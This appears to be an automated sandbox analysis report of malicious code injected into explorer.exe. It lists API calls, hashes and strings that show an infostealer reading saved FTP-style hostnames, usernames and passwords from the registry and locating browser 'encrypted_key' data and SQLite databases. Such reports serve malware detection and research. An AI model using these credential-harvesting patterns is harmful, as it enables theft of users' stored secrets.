                                    • Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                    • Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                    • Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                    • Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                    • Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 00084845
                                    • Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 0008488F
                                    • Part of subcall function 0008482C: lstrlenW.KERNEL32(?), ref: 00084897
                                  • wsprintfW.USER32 ref: 000849A7
                                  • wsprintfW.USER32 ref: 000849B9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                  • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                  • API String ID: 2889301010-4273187114
                                  • Opcode ID: da7e63671b0f4e93c4154db471155565ad8701d4588ea6bee2a31a56f36f1af4
                                  • Instruction ID: 10d8c462f0a5d1c46246b3851c8024d5f0b7ca74f221d7c66667859a4483cc7f
                                  • Opcode Fuzzy Hash: da7e63671b0f4e93c4154db471155565ad8701d4588ea6bee2a31a56f36f1af4
                                  • Instruction Fuzzy Hash: 1631DE357043056BC760FBA5D84196BB6EDFF89788B05492EF4C587282DAB2DC0287A1
                                  APIs
                                  • memcpy.NTDLL(?,?,?,?,00000000), ref: 0008FB32
                                  • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0008FB4D
                                  • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0008FB60
                                  • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0008FB95
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: memcpy
                                  • String ID: -journal$-wal$immutable$nolock
                                  • API String ID: 3510742995-3408036318
                                  • Opcode ID: 2ba235b4505612062e78cee2fce8280b65b643895955b6fa507b90e5b2a5b768
                                  • Instruction ID: 294a5ab0152734e0fc343f7e435cb1baaece950d4deabf5daa23531a8e1283f6
                                  • Opcode Fuzzy Hash: 2ba235b4505612062e78cee2fce8280b65b643895955b6fa507b90e5b2a5b768
                                  • Instruction Fuzzy Hash: 33D19FB16083418FDB14EF28C881B6ABBE5BF95314F08457DE8D98B392DB75D805CB62
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: %$-x0$NaN
                                  • API String ID: 0-62881354
                                  • Opcode ID: b7fc07bd73d9a66ecfa12115a04d499e187338113120827c6c09aada8c07791c
                                  • Instruction ID: 6c4157ef6abc8789903b41b48f2750967716a0974ef9a8a2f7a86ce0e4b3c3ae
                                  • Opcode Fuzzy Hash: b7fc07bd73d9a66ecfa12115a04d499e187338113120827c6c09aada8c07791c
                                  • Instruction Fuzzy Hash: 11D1233060C3828BD775AA28849477EBBE1BF96304F38486EF8C98735AD665C941DB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -x0$NaN
                                  • API String ID: 0-3447725786
                                  • Opcode ID: baa124e87dbeebc4b253c9e50b368a5f420b0208ca8c1b5c65a5900b34f298eb
                                  • Instruction ID: 307a0fbc714bec583ddb3da5ca31e1c7d01a1585dd17795543b9f6cbd4a72020
                                  • Opcode Fuzzy Hash: baa124e87dbeebc4b253c9e50b368a5f420b0208ca8c1b5c65a5900b34f298eb
                                  • Instruction Fuzzy Hash: 93E1253060C3828BD775AA28C49476EBBE1BF96304F38486EF8C99735AD665CD40DB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -x0$NaN
                                  • API String ID: 0-3447725786
                                  • Opcode ID: ebc82d06261bcdc239f2784bd31ea377c46de16c779e0eaa0c3f6f362a9a2d65
                                  • Instruction ID: 5af4e4da5cea5f154fd119f3d2ed9d99af7aef6557b7613b941435b73212b324
                                  • Opcode Fuzzy Hash: ebc82d06261bcdc239f2784bd31ea377c46de16c779e0eaa0c3f6f362a9a2d65
                                  • Instruction Fuzzy Hash: F7E1023060C3828BD765EE28C49476EBBE1BF96304F38486EF8C98735AD665CD41DB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -x0$NaN
                                  • API String ID: 0-3447725786
                                  • Opcode ID: 532721f6db3cf2cbfeb1db598ccdea50ef7b32de67f7a8ad80d7cb47558c555b
                                  • Instruction ID: 38d80dc272db12f369c27d8ab9e1b9b3f46e7504c94a09ddbb968d65dca4388f
                                  • Opcode Fuzzy Hash: 532721f6db3cf2cbfeb1db598ccdea50ef7b32de67f7a8ad80d7cb47558c555b
                                  • Instruction Fuzzy Hash: 5EE1133060C3828BD765EE28C49476EBBE1BF96304F38486EF8C99735AD675C940DB52
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: -x0$NaN
                                  • API String ID: 0-3447725786
                                  • Opcode ID: 33658ef99b809653cf9f5d760d5af93decb8784d64679dbb4ead0c2aed41e7c4
                                  • Instruction ID: 9eb325d8b13de8419a12c3c1fdebbe1caf842573b04f619f98d2af9db357284b
                                  • Opcode Fuzzy Hash: 33658ef99b809653cf9f5d760d5af93decb8784d64679dbb4ead0c2aed41e7c4
                                  • Instruction Fuzzy Hash: 9BE1123060C3828BD765EF28C49476EBBE1BF96304F38486EF8C99735AD665C940DB52
                                  APIs
                                  • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0008720E
                                  • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00087226
                                  • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0008727B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _aulldvrm$_aullrem
                                  • String ID: -x0$NaN
                                  • API String ID: 105165338-3447725786
                                  • Opcode ID: 2362ef364301674ff0b2ccf661c30ce3b42df2588c24734a6dbe200c93ed4eb4
                                  • Instruction ID: 93f17d4b0f8c4b3a8157bc224e6fc931d5739e06ef0917fc6c2979ba7e56ff20
                                  • Opcode Fuzzy Hash: 2362ef364301674ff0b2ccf661c30ce3b42df2588c24734a6dbe200c93ed4eb4
                                  • Instruction Fuzzy Hash: E4D1123060C3828BD775AF28849477EBBE1BF96304F38486EF8C98735AD665C941DB52
                                  APIs
                                  • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00088AAD
                                  • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00088B66
                                  • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00088C9B
                                  • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00088CAE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _allmul$_alldvrm
                                  • String ID: .
                                  • API String ID: 115548886-248832578
                                  • Opcode ID: 1dee9addea6f3844f4b09b2805f88c775bd20230e2989cbee6f0ea89815203b6
                                  • Instruction ID: a618595783e7f2a3f3ba0156b31e79fd035265a36e404902bbfeef64cd03ac86
                                  • Opcode Fuzzy Hash: 1dee9addea6f3844f4b09b2805f88c775bd20230e2989cbee6f0ea89815203b6
                                  • Instruction Fuzzy Hash: E0D1F3B190C7858BD724EF08888427EBBF0FFD5314F44896EF6C596281DBB1C9458B96
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: memset
                                  • String ID: ,$7$9
                                  • API String ID: 2221118986-1653249994
                                  • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                  • Instruction ID: 702d2cd818da1550f47cb19b98de18b775bc913f1f07b666f171365b98cff46d
                                  • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                  • Instruction Fuzzy Hash: EC316A715083849FE731DF60D844B8FBBE8AF85340F00892EF98997252EB759549CBA2
                                  APIs
                                  • lstrlenW.KERNEL32(00000000,00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081BCC
                                  • StrStrIW.SHLWAPI(00000000,.exe), ref: 00081BF0
                                  • StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00081C05
                                  • lstrlenW.KERNEL32(00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081C1C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen
                                  • String ID: .exe
                                  • API String ID: 1659193697-4119554291
                                  • Opcode ID: 3b6586b102a63786dc969872238a75f7c0e986793e750fed812a843c71e5f381
                                  • Instruction ID: a0118cb623026bdd7b2c274268af9be0d5b1314d990870a25fc60afa0df14884
                                  • Opcode Fuzzy Hash: 3b6586b102a63786dc969872238a75f7c0e986793e750fed812a843c71e5f381
                                  • Instruction Fuzzy Hash: 40F0C2343516209AE3757F34AC45AFB67ECFF05341B14482AE586C31A1EB658C82C769
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _alldiv_allmul
                                  • String ID: @T$winTruncate1$winTruncate2
                                  • API String ID: 727729158-2430439695
                                  • Opcode ID: 6c3bc0ffe98ea7ba6db45ea80c207c7cd4ae0650a3233a974d4767bbabfbf473
                                  • Instruction ID: ea18af5ff0e1266221c05a6733f4e9d3e46abdbad8da32bdb85636b44682a127
                                  • Opcode Fuzzy Hash: 6c3bc0ffe98ea7ba6db45ea80c207c7cd4ae0650a3233a974d4767bbabfbf473
                                  • Instruction Fuzzy Hash: 8D21B031305200ABEF54AE29CC85EAB37A9FF86310B55812AFD84DB646E634D810D762
                                  APIs
                                  • _allmul.NTDLL(?,00000000,00000018), ref: 0009316F
                                  • _allmul.NTDLL(-00000001,00000000,?,?), ref: 000931D2
                                  • _alldiv.NTDLL(?,?,00000000), ref: 000932DE
                                  • _allmul.NTDLL(00000000,?,00000000), ref: 000932E7
                                  • _allmul.NTDLL(?,00000000,?,?), ref: 00093392
                                    • Part of subcall function 000916CD: memset.NTDLL ref: 0009172B
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _allmul$_alldivmemset
                                  • String ID:
                                  • API String ID: 3880648599-0
                                  • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                  • Instruction ID: 7d5417d354a438c68078f624bfc985cf19b5d1ae52062b2927a0073bfdafc28c
                                  • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                  • Instruction Fuzzy Hash: C1D188706083419BDB64DF69C480BAEBBE1BF88704F14882DF99587252DB70EE45DF92
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: FOREIGN KEY constraint failed$new$old
                                  • API String ID: 0-384346570
                                  • Opcode ID: 3aaead122d65ded614d39b256a48cbbc3585bd41769f8ec99ba0c062035d0474
                                  • Instruction ID: d2be0542dc7b103aa2383b59d4d19c985a4c98580b6e0a806adb31106ad231e1
                                  • Opcode Fuzzy Hash: 3aaead122d65ded614d39b256a48cbbc3585bd41769f8ec99ba0c062035d0474
                                  • Instruction Fuzzy Hash: 8FD14A707083009FD754DF64C481BAFBBE9AB89750F10891EF9458B392DB74D945CB92
                                  APIs
                                  • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 000896E7
                                  • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00089707
                                  • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00089739
                                  • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0008976C
                                  • _allmul.NTDLL(?,?,?,?), ref: 00089798
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _alldiv$_allmul
                                  • String ID:
                                  • API String ID: 4215241517-0
                                  • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                  • Instruction ID: 2354deb6ee630c1303f222db6580eb32dc7d712fabd7219d97ed6de5167efc95
                                  • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                  • Instruction Fuzzy Hash: 2E210F3222C7252AE7747D5A5CC0BBB3AC8FB90391F2D012EFCC182242FD52885083A2
                                  APIs
                                  • _allmul.NTDLL(?,00000000,00000000), ref: 0009B1B3
                                  • _alldvrm.NTDLL(?,?,00000000), ref: 0009B20F
                                  • _allrem.NTDLL(?,00000000,?,?), ref: 0009B28A
                                  • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0009B298
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _alldvrm_allmul_allremmemcpy
                                  • String ID:
                                  • API String ID: 1484705121-0
                                  • Opcode ID: 737b708a8e9317edc1ac7e99e378c4384ccc493322af8983ed13a4c59795ab5c
                                  • Instruction ID: 34dcaf0522566fee0e357b28426f49add1cfa5add8272fba0f91c0916a67490a
                                  • Opcode Fuzzy Hash: 737b708a8e9317edc1ac7e99e378c4384ccc493322af8983ed13a4c59795ab5c
                                  • Instruction Fuzzy Hash: 6F4126716083019FCB58EF29D99196EBBE5EFC8310F04892DF98587262DB31EC05DB52
                                  APIs
                                  • GetHGlobalFromStream.OLE32(?,?), ref: 000818A7
                                  • GlobalFix.KERNEL32(00084B57), ref: 000818B6
                                  • GlobalUnWire.KERNEL32(?), ref: 000818F4
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000818E8
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Global$Heap$AllocateFromMemoryMoveProcessStreamWire
                                  • String ID:
                                  • API String ID: 2207111602-0
                                  • Opcode ID: 5cafbe28a3a3ec4851cb6a259a3ffa732d8cee4bddaac059c2034672973d27b0
                                  • Instruction ID: 060e2cafb6cd9e1f5da74f6afce5632343d673e94969e39a5aa9d19e364d1975
                                  • Opcode Fuzzy Hash: 5cafbe28a3a3ec4851cb6a259a3ffa732d8cee4bddaac059c2034672973d27b0
                                  • Instruction Fuzzy Hash: DE016D75205716AF9B016F65DC189DF7BEDFF84351B10842EF88583221EF36D9169B20
                                  APIs
                                  • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                  • lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                  • lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                  • lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1475610065-0
                                  • Opcode ID: 28fed4ad0f0cf8eadd10525803851a75bf33ec1a9cae8159dccb8e6dc05c9a80
                                  • Instruction ID: dbad73746742703d9ceac516fc3b64f4e155f3a4600329a9211bef27ba9de466
                                  • Opcode Fuzzy Hash: 28fed4ad0f0cf8eadd10525803851a75bf33ec1a9cae8159dccb8e6dc05c9a80
                                  • Instruction Fuzzy Hash: BCE065B230021C2B571477AE9C94DBB7BDCDFD96A5705003AFA45D3302EA569C0546B0
                                  APIs
                                  • StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 00082FC1
                                  • lstrlen.KERNEL32("encrypted_key":",?,00083FA8), ref: 00082FCE
                                  • StrStrIA.SHLWAPI("encrypted_key":",000D692C), ref: 00082FDD
                                    • Part of subcall function 0008190B: lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
                                    • Part of subcall function 0008190B: lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
                                    • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,?), ref: 00081946
                                    • Part of subcall function 0008190B: lstrcat.KERNEL32(00000000,00000000), ref: 0008194A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$lstrcat
                                  • String ID: "encrypted_key":"
                                  • API String ID: 493641738-877455259
                                  • Opcode ID: a4322bf6803f9586c14811d2a79b8cf0638dba37bcc99194ce32fdcef0ee0d4f
                                  • Instruction ID: 530b9dc33729bb16010b955b94d5cbd9baf921e2c03f7890b7047916ace376ef
                                  • Opcode Fuzzy Hash: a4322bf6803f9586c14811d2a79b8cf0638dba37bcc99194ce32fdcef0ee0d4f
                                  • Instruction Fuzzy Hash: 34E09B366067645F93617BB95C548877F5CAF066113090076F74197213DF678801D7B4
                                  APIs
                                    • Part of subcall function 00086A81: memset.NTDLL ref: 00086A9C
                                  • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 000AF2A1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _aulldivmemset
                                  • String ID: %llu$%llu
                                  • API String ID: 714058258-4283164361
                                  • Opcode ID: 1fa5d3c7b91306c1d223e2b65371b4838854418b1e936b93da1fe013090c2820
                                  • Instruction ID: 69e4f2254b1926815d5b2e7edcfc80b6c22c58c624316906a26c5ce3a17bda3f
                                  • Opcode Fuzzy Hash: 1fa5d3c7b91306c1d223e2b65371b4838854418b1e936b93da1fe013090c2820
                                  • Instruction Fuzzy Hash: E221D4B26446066BCA10BA64CC42FBB7758AF81730F044239FA65972C2DB21DC1187E1
                                  APIs
                                  • _allmul.NTDLL(?,00000000,?), ref: 00092174
                                  • _allmul.NTDLL(?,?,?,00000000), ref: 0009220E
                                  • _allmul.NTDLL(?,00000000,00000000,?), ref: 00092241
                                  • _allmul.NTDLL(00082E26,00000000,?,?), ref: 00092295
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: _allmul
                                  • String ID:
                                  • API String ID: 4029198491-0
                                  • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                  • Instruction ID: 63a2b8f53f14eb91fa2b34f2965950cece02bef0a7323c9bf8aaa3ee151b33ee
                                  • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                  • Instruction Fuzzy Hash: 4DA19F70708702AFDB54EF64C891A6EB7E5AFD8704F00482DF6958B352EB71ED449B42
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: memcpymemset
                                  • String ID:
                                  • API String ID: 1297977491-0
                                  • Opcode ID: 4140e2bc45dec264c31e971d92f3cbd81a15c7904ba40de7e28c5e30a9fc9b6f
                                  • Instruction ID: 69a05d0e1e7b7fd6402ed86353928fc025ddec182e0930d0124d2d6646c1b3c6
                                  • Opcode Fuzzy Hash: 4140e2bc45dec264c31e971d92f3cbd81a15c7904ba40de7e28c5e30a9fc9b6f
                                  • Instruction Fuzzy Hash: D2818D7261C3149FC750EF28C880A6BBBE5FF88704F14492DF88A97252E670E905DB92
                                  APIs
                                  • lstrlen.KERNEL32(?,?,?,?,00000000,00082783), ref: 0008192B
                                  • lstrlen.KERNEL32(00000000,?,?,?,00000000,00082783), ref: 00081930
                                  • lstrcat.KERNEL32(00000000,?), ref: 00081946
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0008194A
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrcatlstrlen
                                  • String ID:
                                  • API String ID: 1475610065-0
                                  • Opcode ID: a9493810aaa3a9f76d00b8f14972c51386d0793da0f89b16e647a1f4bc78741e
                                  • Instruction ID: 3aa736acb3aa67acc1ae95169c8ee23454d81dbbc04c5d0cca38af8dffb300d9
                                  • Opcode Fuzzy Hash: a9493810aaa3a9f76d00b8f14972c51386d0793da0f89b16e647a1f4bc78741e
                                  • Instruction Fuzzy Hash: A6E09BA630021C2B572077AE5C94DBB77DCDFD95A53090036FE44C3302EE5AAC0247B0

                                  Execution Graph

                                  Execution Coverage:9.3%
                                  Dynamic/Decrypted Code Coverage:55.1%
                                  Signature Coverage:0%
                                  Total number of Nodes:49
                                  Total number of Limit Nodes:2
                                  execution_graph 949 637f4 950 63804 949->950 955 6372c 950->955 952 63809 954 63817 952->954 959 622b4 952->959 956 6375a 955->956 957 63777 RegCreateKeyExW 956->957 958 637bc 957->958 958->952 960 622d6 959->960 961 622c8 CreateStreamOnHGlobal 959->961 960->954 961->960 981 6a1e0 982 6a1e6 981->982 985 6a298 982->985 990 6a29d 985->990 986 6a385 LoadLibraryA 986->990 988 6a3e0 VirtualProtect VirtualProtect 989 6a46e 988->989 989->989 990->986 990->988 991 6a248 990->991 992 6a1af 993 6a1bd 992->993 994 6a298 3 API calls 993->994 995 6a1cf 993->995 994->995 962 6a298 967 6a29d 962->967 963 6a385 LoadLibraryA 963->967 965 6a3e0 VirtualProtect VirtualProtect 966 6a46e 965->966 966->966 967->963 967->965 968 6a3d5 967->968 969 63608 974 63458 StrStrIW 969->974 971 6363b 972 63458 4 API calls 971->972 973 6365d 972->973 980 6348f 974->980 975 63523 RegOpenKeyExW 976 635ef 975->976 979 6354d 975->979 976->971 977 635b5 RegEnumKeyExW 978 635e4 RegCloseKey 977->978 977->979 978->976 979->977 980->975 996 63668 997 63458 4 API calls 996->997 998 6369b 997->998 999 63458 4 API calls 998->999 1000 636bd 999->1000 1001 6a1f9 1002 6a228 1001->1002 1004 6a248 1001->1004 1003 6a298 3 API calls 1002->1003 1003->1004

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00062E04 8 Function_00061B8C 0->8 42 Function_00061838 0->42 70 Function_00061860 0->70 1 Function_00061405 2 Function_00062700 10 Function_00062688 2->10 2->70 3 Function_00061000 4 Function_00061980 5 Function_0006B00C 6 Function_0006298C 7 Function_0006188C 7->42 8->42 9 Function_00063608 64 Function_00063458 9->64 10->42 11 Function_00062308 12 Function_00061508 13 Function_00062514 28 Function_000623A0 13->28 51 Function_0006234C 13->51 54 Function_00062354 13->54 71 Function_00062360 13->71 80 Function_000623F0 13->80 14 Function_00061B14 14->42 15 Function_00069912 16 Function_00069C92 17 Function_0006B192 18 Function_00061D10 18->42 83 Function_000618F8 18->83 19 Function_00062410 34 Function_000623AC 19->34 19->80 20 Function_00062610 20->42 21 Function_0006971C 22 Function_0006141D 23 Function_0006A298 63 Function_0006A25A 23->63 24 Function_00062498 24->34 47 Function_00062340 24->47 25 Function_000699A7 26 Function_000647A7 27 Function_00061822 29 Function_00061E20 29->4 29->7 29->18 29->42 46 Function_00061C40 29->46 61 Function_000618D0 29->61 68 Function_00061DE0 29->68 29->70 29->83 30 Function_000628A0 30->42 30->70 78 Function_00062774 30->78 31 Function_0006A1AF 31->23 32 Function_0006372C 32->42 32->70 33 Function_000622AC 35 Function_0006272C 36 Function_000630A8 36->2 36->10 36->35 36->36 36->70 82 Function_00062F7C 36->82 84 Function_00062AF8 36->84 37 Function_00069EB4 38 Function_000622B4 39 Function_000614B2 40 Function_00069930 41 Function_000638B0 41->41 41->42 55 Function_00061AD4 41->55 43 Function_00061938 44 Function_00062938 45 Function_00069FC2 48 Function_000629C0 48->10 49 Function_00062BC0 49->2 49->10 49->20 49->35 49->42 49->43 58 Function_00062A54 49->58 49->70 50 Function_000641CF 52 Function_00061A4C 53 Function_000636C8 53->14 66 Function_000621E4 53->66 53->70 74 Function_000618E8 53->74 56 Function_000614D4 57 Function_00061254 58->42 58->70 59 Function_00063254 59->6 59->10 59->35 59->36 59->42 59->44 59->70 60 Function_0006A055 62 Function_00069ADA 64->2 64->10 64->30 64->42 64->48 64->59 64->64 64->70 64->78 65 Function_000641D9 66->29 66->42 66->70 67 Function_0006A1E0 67->23 68->52 69 Function_00061560 70->55 72 Function_0006156C 73 Function_00062B6C 73->13 73->24 75 Function_000622E8 76 Function_00063668 76->64 77 Function_00061576 78->42 78->70 78->78 79 Function_000637F4 79->11 79->32 79->33 79->38 79->53 79->54 79->73 79->75 81 Function_00062570 79->81 80->34 81->28 81->42 81->54 82->0 82->49 82->58 82->70 85 Function_00062EF8 82->85 84->42 85->20 86 Function_00064178 87 Function_0006A1F9 